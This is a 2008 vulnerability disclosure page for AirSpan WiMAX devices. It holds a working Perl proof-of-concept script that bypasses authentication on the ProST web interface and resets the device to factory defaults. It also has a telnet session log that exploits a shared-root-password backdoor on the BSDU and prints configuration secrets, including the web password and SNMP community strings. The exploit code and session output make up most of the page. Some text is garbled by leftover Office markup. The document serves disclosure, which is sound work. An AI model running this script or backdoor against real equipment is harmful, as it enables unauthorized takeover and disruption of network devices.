airspan4wimax - AirSpan WiMAX MicroMAX

ProST web access authentication bypass ( publication date 8.03.2008)
- A remote, unauthenticated attacker may be able to gain access to a vulnerable device and make arbitrary changes to its configuration.
- #!/usr/bin/perl -w
- ########################################
  #                                      #
  # US-CERT VU#248372, example          #
  # by Arthur Lashin diriger@gmail.com #
  #                                      #
  ########################################
- use strict;
  use LWP::UserAgent;
-     unless(defined$ARGV[0]) {
          die "\nUsage: $0 prost_ip\n\n";
      }
- my $ip = $ARGV[0];
- &prost_reset_to_default($ip);
-     sub prost_reset_to_default {
          my $ip = shift;
          my $timeout = 20;
- my $html_body = undef;
-         my $ua = LWP::UserAgent->new;
          $ua->timeout($timeout);
          my %form = ('DialogText' => 'to+reset+to+default', 'Advanced' => 16);
          my $response = $ua->post('http://' . $ip . '/process_adv/', \%form);
          if($response->is_success) {
              $html_body = $response->content;
              print $html_body;
          } else {
              print "Connect to $ip failed: " . $response->status_line . "\n";
          }
- return $html_body;
  }
- Vulnerability fixed 9.03.2008 in ss-6.5.40.71.z
Base Station Distribution Unit (BSDU) backdoor (publication date 18.03.2008)
- AirSpan BSDU has a serious security hole, which allows anyone to get remote access to device with root privileges using undocumented telnet access that is on by default. This is possible because all BSDUs share the same root password:
- [root@diriger]# telnet 192.168.1.254< xml="true" ns="urn:schemas-microsoft-com:office:office" prefix="o" namespace="">
  
  Trying 192.168.1.254...
  
  Connected to 192.168.1.254.
  
  Escape character is '^]'.
  
  bsdu-wimax login: root
  
  ~ # uname -ar
  
  Linux bsdu-wimax 2.6.16.19-default #31 PREEMPT Wed Oct 10 18:45:13 IST 2007 ppc unknown
  
  ~ #
  
  ~ # cd /root/shared/system
  
  /root/shared/system # ls -lF
  
  -rw-r--r--    1 root     root            4 Feb 26 08:17 activeBank
  
  -rw-r--r--    1 root     root          256 Feb 26 08:15 bank1metadata
  
  -rw-r--r--    1 root     root        27073 Feb 26 08:18 bank1verification
  
  -rw-r--r--    1 root     root          256 Sep 5 2007 bank2metadata
  
  -rw-r--r--    1 root     root        27073 Sep 6 2007 bank2verification
  
  -rw-r--r--    1 root     root          223 Mar 11 14:51 cfgsh.conf
  
  /root/shared/system #
  
  /root/shared/system # cat ./cfgsh.conf
  
  # WiMAX BSDU Configuration Shell config file
  
  ifconf static
  
  ip 192.168.1.254
  
  nmask 255.255.255.0
  
  gw 192.168.1.1
  
  ns 10.0.0.1
  
  sntps 10.0.0.2
  
  httplp < xml="true" ns="urn:schemas-microsoft-com:office:smarttags" prefix="st1" namespace="">admin,k5Rw2SDcTi
  
  snmproc w3E56G_0&
  
  snmprwc kY^$ds_*
  
  mvlan 15
  
  Here “k5Rw2SDcTi” is web access password. One can edit file ./cfgsh.conf and reboot device to apply new settings.
BSR unauthorized web & telnet access (publication deprecated)